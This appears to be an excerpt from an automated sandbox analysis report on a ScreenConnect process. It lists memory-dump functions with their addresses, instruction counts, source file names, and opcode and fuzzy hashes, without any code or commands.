                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000D.00000002.1807791777.00007FF7C01D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C01D0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_13_2_7ff7c01d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 68130907b2e3cbd0b9ffbe82831b43c3ec39db37e8b6e2a63003aa27ffcea637
                                                                                                                                                                                                                                                        • Instruction ID: 2589ab67b5b55a8c09a26ce9974d4d20fa682247aa73a5771687383f99f38a55
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 68130907b2e3cbd0b9ffbe82831b43c3ec39db37e8b6e2a63003aa27ffcea637
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9931A57190DBC94FD747AB385824768BFB0EF53214B4901EBC189C71E3DA58A809C362
                                                                                                                                                                                                                                                        Function 00007FF7C01DC9FD Relevance: .1, Instructions: 117COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000D.00000002.1807791777.00007FF7C01D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C01D0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_13_2_7ff7c01d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: b59d3803deb786cfebb849bf786ba38e2db860137364195a730983a51dc0410e
                                                                                                                                                                                                                                                        • Instruction ID: d733bce4b3339d9132df58c09b626bd23a966ccc3a85f02728f35ff5232d0539
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b59d3803deb786cfebb849bf786ba38e2db860137364195a730983a51dc0410e
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E7314B30A1CE950FD71DAB2858566B6BBE0FFA9710F00416EE44EC7283DD28B84583D2
                                                                                                                                                                                                                                                        Function 00007FF7C01D280B Relevance: .1, Instructions: 114COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000D.00000002.1807791777.00007FF7C01D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C01D0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_13_2_7ff7c01d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: b6efe7a307f88e069d88221dfc9e2f525596df1067d248d7b5ce2db33346cc79
                                                                                                                                                                                                                                                        • Instruction ID: fb2a63e4d173b13bcd43191d90d92bbacd54542ad66f6fb4152652eada2d7658
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b6efe7a307f88e069d88221dfc9e2f525596df1067d248d7b5ce2db33346cc79
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 31314BB160CE4A5FDB48EF2CA446AE9B790FF95720B400269E44EC3287DE34F81283C0
                                                                                                                                                                                                                                                        Function 00007FF7C01D8139 Relevance: .1, Instructions: 105COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000D.00000002.1807791777.00007FF7C01D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C01D0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_13_2_7ff7c01d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 66ce2f3cffef90c05f742e02cfa61acaf8243e42878168a869f365d0040c8067
                                                                                                                                                                                                                                                        • Instruction ID: a74fffb45e89027a58a714ceff97d1c335db0e6666845d493e0ef13df4ab85c9
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 66ce2f3cffef90c05f742e02cfa61acaf8243e42878168a869f365d0040c8067
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 27312772F4DE484FCB569B2868212ECBBA1FF45724F4401AAE15DC3792CB29A810C7C6
                                                                                                                                                                                                                                                        Function 00007FF7C01D9B3C Relevance: .1, Instructions: 95COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000D.00000002.1807791777.00007FF7C01D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C01D0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_13_2_7ff7c01d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 0d6fcd0a8d9265dac51c0e9e116db0c70a974fb35b02af033a066b3d315bf5f3
                                                                                                                                                                                                                                                        • Instruction ID: e8dd9afd2ab8ba9a2c137c783202c955cc0dd5a6dd5e7fb5ff1b2368dccc5082
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0d6fcd0a8d9265dac51c0e9e116db0c70a974fb35b02af033a066b3d315bf5f3
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6231A27071CD498FCB89EF2D9424AA9B7A1FF99304B144299E05EC7292CF30A802C784
                                                                                                                                                                                                                                                        Function 00007FF7C01DCA3D Relevance: .1, Instructions: 94COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000D.00000002.1807791777.00007FF7C01D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C01D0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_13_2_7ff7c01d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 4f28eb5cf7ab9f27cd9078fa9645cdf0f2b12f54b8b3b8b32d5afc9276199e6b
                                                                                                                                                                                                                                                        • Instruction ID: be0c2c94f982e7885fcb609ad551ebfabda5e4e752928a9772311f5b67644cbd
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4f28eb5cf7ab9f27cd9078fa9645cdf0f2b12f54b8b3b8b32d5afc9276199e6b
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F8212D7061CE855FC70D9B289456ABAB7D1FBA9750F40416EE04EC7283DE24B80583D2
                                                                                                                                                                                                                                                        Function 00007FF7C01DE1AE Relevance: .1, Instructions: 93COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000D.00000002.1807791777.00007FF7C01D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C01D0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_13_2_7ff7c01d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: e22eec884e2e09eba8623548a9bcfd03be586a52d7a1757192f8e55cb519ac83
                                                                                                                                                                                                                                                        • Instruction ID: b19310f4a431e9696ea9f6c0e00505247326080a3730487f090c40c07fb44121
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e22eec884e2e09eba8623548a9bcfd03be586a52d7a1757192f8e55cb519ac83
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: CE318E708087574BE70AFF6498512EDBAA1AB46B20F90057ED509D73C2DF3865468BE2
                                                                                                                                                                                                                                                        Function 00007FF7C01D7DEA Relevance: .1, Instructions: 90COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000D.00000002.1807791777.00007FF7C01D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C01D0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_13_2_7ff7c01d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: fddf78c95ddba24d48311419354cc7016c040e3e95d3697722a7ed760e12c619
                                                                                                                                                                                                                                                        • Instruction ID: 316c405ae120cd570d45e5a08cac685f543a2c159e931e4bf8449e36445a0307
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: fddf78c95ddba24d48311419354cc7016c040e3e95d3697722a7ed760e12c619
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8521573150DF894FD766AB35A850199FBE0FF85320B4402BBD04DC7292EB28BD02C7A1
                                                                                                                                                                                                                                                        Function 00007FF7C01DE206 Relevance: .1, Instructions: 85COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000D.00000002.1807791777.00007FF7C01D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C01D0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_13_2_7ff7c01d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 2a1551fc068b0268da5f8dd584f61c789b88466d3cb5c32ae474598bb30e70a6
                                                                                                                                                                                                                                                        • Instruction ID: 74cb020a109ad3941aef5858f92fe5597743bbf2f92f9a51d2acc99a6955a9ea
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2a1551fc068b0268da5f8dd584f61c789b88466d3cb5c32ae474598bb30e70a6
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3D315A70D083464BEB49FF6598513FDBAE1AB45B20F9040BED509D73C2DE386A458BA2
                                                                                                                                                                                                                                                        Function 00007FF7C01D7215 Relevance: .1, Instructions: 82COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000D.00000002.1807791777.00007FF7C01D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C01D0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_13_2_7ff7c01d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 184b4c190ab1c0bc858048c3da3e0156eb81be3a843920d25e1713f55d2ca000
                                                                                                                                                                                                                                                        • Instruction ID: 1a5fc06584fdc2f22f83aafa3cab61016904cb462a498abf2d336b9b3d5f3634
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 184b4c190ab1c0bc858048c3da3e0156eb81be3a843920d25e1713f55d2ca000
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0021F61154CA860FE7467A6878507F8E3D1AFC5761F9804B6E84CC63D2EE1CBA8283A1
                                                                                                                                                                                                                                                        Function 00007FF7C01D96BD Relevance: .1, Instructions: 81COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000D.00000002.1807791777.00007FF7C01D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C01D0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_13_2_7ff7c01d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 2ce6fdda41e2b214dd98d591e6f46c0e2a43a0207140799671374dd90b7a8c64
                                                                                                                                                                                                                                                        • Instruction ID: db510e0b8e499589a65cd54faace03638f9906d4b774d2847c00b57e25eb174c
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2ce6fdda41e2b214dd98d591e6f46c0e2a43a0207140799671374dd90b7a8c64
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E8210D7150DBD54FC3569F2854142B6BFE0EF96361F4505BFE0C9C76D2CA2864058791
                                                                                                                                                                                                                                                        Function 00007FF7C01D93C5 Relevance: .1, Instructions: 78COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000D.00000002.1807791777.00007FF7C01D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C01D0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_13_2_7ff7c01d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 368d60a974cd049d5a6fb7c8ee253dae4090884ffae426b052bea7e019c56fd3
                                                                                                                                                                                                                                                        • Instruction ID: cb45bea3d02024af1e2b0a7444188b16b3dd30b0295b26722d92be34e722009b
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 368d60a974cd049d5a6fb7c8ee253dae4090884ffae426b052bea7e019c56fd3
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F121933144D7898FCB46EF64D8116E9FBF0EF5622074941EBD089C75A3CB6CA806CBA1
                                                                                                                                                                                                                                                        Function 00007FF7C01D26BF Relevance: .1, Instructions: 73COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000D.00000002.1807791777.00007FF7C01D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C01D0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_13_2_7ff7c01d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 08e3d8fbeed5ee09ef164727c517cbeed8b529686eedc3a6388fbc532b5341fc
                                                                                                                                                                                                                                                        • Instruction ID: 36bb0d6dc332b9acd0d3ad976a96297016d88f51c089e26bf66f1e04c33c075b
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 08e3d8fbeed5ee09ef164727c517cbeed8b529686eedc3a6388fbc532b5341fc
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9D217F70608A4A8FD788EF28C460BB5B3A1FF58314F4445B9E45EC7392CE34B851CB90
                                                                                                                                                                                                                                                        Function 00007FF7C01DB375 Relevance: .1, Instructions: 72COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000D.00000002.1807791777.00007FF7C01D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C01D0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_13_2_7ff7c01d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 996e2b093b1b2044053dfd132d179e6e8936171747cac657b7e179bf1896911e
                                                                                                                                                                                                                                                        • Instruction ID: 96039bbc2ebf3c5dc00979905e7635189b5774339bc1db0bebd507e57dbc448f
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 996e2b093b1b2044053dfd132d179e6e8936171747cac657b7e179bf1896911e
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8A113A6170DA965FD7466B7CB4952F8BB90EF9A23134402F7D448CB287DE18588683D1
                                                                                                                                                                                                                                                        Function 00007FF7C01DD60E Relevance: .1, Instructions: 71COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000D.00000002.1807791777.00007FF7C01D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C01D0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_13_2_7ff7c01d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: cc9d5530f542f74a3eb80ada720b88240a2fc4fdf15b94fd20578ba19f010c9a
                                                                                                                                                                                                                                                        • Instruction ID: d02cc70cb2553d07933e06b7ab471a223bde96c85d562bf84ac24856d7e12faf
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: cc9d5530f542f74a3eb80ada720b88240a2fc4fdf15b94fd20578ba19f010c9a
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0E11387160DE924FD31AAB2C60656A9FBD0EF4927470486EFC08BC7587DD24B51387C9
                                                                                                                                                                                                                                                        Function 00007FF7C01E7DF3 Relevance: .1, Instructions: 71COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000D.00000002.1807791777.00007FF7C01D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C01D0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_13_2_7ff7c01d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: e4329bcdc9627e5548233352d0cc7852b94ca6d615b602f010ee91a58de28589
                                                                                                                                                                                                                                                        • Instruction ID: 6d45aa1c4d64efae8e9bad682de48bf9332a7b1d04dead39eb85dbe7c494d370
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e4329bcdc9627e5548233352d0cc7852b94ca6d615b602f010ee91a58de28589
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F211299290EAC25FE747673C28212E8BF60EF1266470905F7C09CCF1D7D9046919C3E1
                                                                                                                                                                                                                                                        Function 00007FF7C01DCFED Relevance: .1, Instructions: 71COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000D.00000002.1807791777.00007FF7C01D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C01D0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_13_2_7ff7c01d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 4678cf592daa504c00e78ac453136e03a75f0c5aa49e2f48b6595a8ed3dd32f3
                                                                                                                                                                                                                                                        • Instruction ID: 735417fe5adf6cede6053c7a95976c72d391496be98c4c069eaf066829ab987c
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4678cf592daa504c00e78ac453136e03a75f0c5aa49e2f48b6595a8ed3dd32f3
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F321A83291D7835FF7126B3458250ADFFA1FF82220F8901B6D44DC7593EE29780687A1
                                                                                                                                                                                                                                                        Function 00007FF7C01E499D Relevance: .1, Instructions: 70COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000D.00000002.1807791777.00007FF7C01D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C01D0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_13_2_7ff7c01d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 83b2cc86649de612fe266f8a846babafe548cc8882cefe2e2169efc662ec735e
                                                                                                                                                                                                                                                        • Instruction ID: a34050a1904a972e9abcd6d7d1d2b1f10f5fb531a1ee4ce80a82fc7f51a2b93f
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 83b2cc86649de612fe266f8a846babafe548cc8882cefe2e2169efc662ec735e
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 94110D3090DB828FE751FB3894651A9B7E0EF0622478405FAC099CB6A3DB29BC46C790
                                                                                                                                                                                                                                                        Function 00007FF7C01E815D Relevance: .1, Instructions: 67COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000D.00000002.1807791777.00007FF7C01D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C01D0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_13_2_7ff7c01d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 5c04c02669c92f6be37e8cf672303158e1ba71f1ead26daca56679fa639011a3
                                                                                                                                                                                                                                                        • Instruction ID: e8a5acab5b4fa10e990aa32a75931e3a8c317bdb5d271439120c2c355adf7f6c
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5c04c02669c92f6be37e8cf672303158e1ba71f1ead26daca56679fa639011a3
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A711B1A060DECA4FDB47AB395468264BFA1AF86110B5941FBC45DCF193CE28B81AC391
                                                                                                                                                                                                                                                        Function 00007FF7C01D4DDD Relevance: .1, Instructions: 65COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000D.00000002.1807791777.00007FF7C01D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C01D0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_13_2_7ff7c01d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 946104185611e1d56b5430aca86b92f065f513523cce57c9a9e07c2764501cf0
                                                                                                                                                                                                                                                        • Instruction ID: cb0a582696c4a13a0f9e78a80888c016916b6bcd16eb0e103a5011206f3fbbfc
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 946104185611e1d56b5430aca86b92f065f513523cce57c9a9e07c2764501cf0
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8F118E70A0DA489FDF859F6998A82ECBFA0FF59304B45449AD09DC36A3CB30A410CB85
                                                                                                                                                                                                                                                        Function 00007FF7C01DE8CB Relevance: .1, Instructions: 62COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000D.00000002.1807791777.00007FF7C01D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C01D0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_13_2_7ff7c01d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: a9c3df06e76de83576f0947cdd2b3ab778a66eb4a01c3fde32063cbd4b0198e6
                                                                                                                                                                                                                                                        • Instruction ID: 44d5ea5e0881173662aac1ecf0c89e3bea30a413994fd33b8aa88ee3f881623f
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a9c3df06e76de83576f0947cdd2b3ab778a66eb4a01c3fde32063cbd4b0198e6
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4711B470A1492E8FDBA4EB28D898BE8B3B1FF58355F4042A5C11DE7251CF346AD18F80
                                                                                                                                                                                                                                                        Function 00007FF7C01D293E Relevance: .1, Instructions: 57COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000D.00000002.1807791777.00007FF7C01D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C01D0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_13_2_7ff7c01d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 9a553bbe7d1fa26fd03574538847cc9d2adfe40e3b1f7a9c265143d75ac52f22
                                                                                                                                                                                                                                                        • Instruction ID: d8195cfd47a7d795d3e2ecbd0c1af4d10f389910142e50c01392e5978192a004
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9a553bbe7d1fa26fd03574538847cc9d2adfe40e3b1f7a9c265143d75ac52f22
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 36112B70608A4A8FDB89EF28C050BA5B7A1FF68314B5441A8D45ECB287CB35F845CBD1
                                                                                                                                                                                                                                                        Function 00007FF7C01D29A7 Relevance: .1, Instructions: 56COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000D.00000002.1807791777.00007FF7C01D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C01D0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_13_2_7ff7c01d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 137bc526cc195e938b8893693d4c9aad440f063b4aa6691b2090c2fa211d6d87
                                                                                                                                                                                                                                                        • Instruction ID: 02d7671b05d34806f515bf45ebef84c53ff2e800e2e64635a1f7664b1a26b466
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 137bc526cc195e938b8893693d4c9aad440f063b4aa6691b2090c2fa211d6d87
